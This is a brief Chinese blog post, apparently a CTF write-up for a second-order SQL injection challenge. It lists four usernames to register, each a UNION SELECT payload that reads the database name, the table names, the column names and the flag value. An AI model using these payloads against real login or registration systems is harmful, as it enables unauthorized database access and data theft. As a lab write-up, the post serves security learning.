pwn the box——twice sql injection_liebe1*1的博客-爱代码爱编程
目录
一、根据题目发现是个登录、注册框
二、在注册的时候添加命令并登录
用户名:查库命令:1’union select database() # 密码:123456
用户名:查表命令:1’union select group_concat(table_name) from information_schema.tables where table_schema=”ctftraining” # 密码:123456
用户名:查字段名:1’ union select group_concat(column_name) from information_schema.columns where table_name=”flag” # 密码:123456
用户名:查字段值:1’ union select flag from flag # 密码:123456